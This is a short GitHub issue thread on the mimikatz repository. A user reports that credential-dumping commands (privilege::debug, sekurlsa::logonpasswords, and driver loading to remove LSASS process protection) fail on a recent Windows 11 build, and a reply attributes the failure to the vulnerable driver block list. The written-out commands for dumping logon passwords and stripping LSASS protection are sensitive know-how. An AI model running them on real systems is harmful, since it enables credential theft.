Windows 11 Build 10.0.22621.1848

GjBrutello commented 1 year ago

Hello! In the last Windows build I get error: mimikatz(commandline) # privilege::debug Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

Also trying to unlock lsass:

mimikatz(commandline) # privilege::debug Privilege '20' OK

mimikatz(commandline) # !+ [*] 'mimidrv' service not present [+] 'mimidrv' service successfully registered [+] 'mimidrv' service ACL to everyone ERROR kull_m_service_install ; StartService (0x800b010c)

mimikatz(commandline) # !processprotect /remove /process:LSASS.EXE Process : LSASS.EXE PID 1232 -> 00/00 [0-0-0] ERROR kull_m_kernel_ioctl ; CreateFile (0x00000002)

mimikatz(commandline) # exit Bye!

It seems the new Windows 11 does not allow to create a service without a digital signature. Windows 11 Build 10.0.22621.1848

GjBrutello commented 1 year ago

Mimikatz 2.2.0 20220919 Djoin parser & Citrix SSO Extractor, Sep 19, 2022. Tried other versions but the same result.

lbrauns commented 1 year ago

Your error when installing the service resolves to CERT_E_REVOKED. This is likely due to the vulnerable driver block list.

gentilkiwi / mimikatz

Windows 11 Build 10.0.22621.1848 #431

mimikatz(commandline) # exit Bye!